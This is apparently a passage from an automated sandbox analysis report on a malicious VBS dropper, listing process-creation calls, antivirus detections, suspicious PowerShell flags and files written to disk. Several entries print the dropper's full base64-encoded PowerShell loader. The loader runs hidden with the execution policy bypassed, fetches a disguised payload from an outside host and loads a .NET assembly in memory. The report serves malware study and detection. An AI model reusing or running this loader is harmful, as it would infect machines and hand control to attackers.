AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1
ShellExecuteExW Aug. 1, 2024, 10:56 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW Aug. 1, 2024, 10:56 a.m.	thread_identifier: 2344 thread_handle: 0x00000450 process_identifier: 296 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000454	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Skyhigh	BehavesLike.VBS.Dropper.cp
Symantec	Scr.Malcode!gen
Kaspersky	HEUR:Trojan.Script.Generic
Kingsoft	Script.Dropper.vbs.2023281

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 1, 2024, 10:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 1, 2024, 10:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (3 events)

parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

buttersmoothflowerwayssmooth.gIF.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All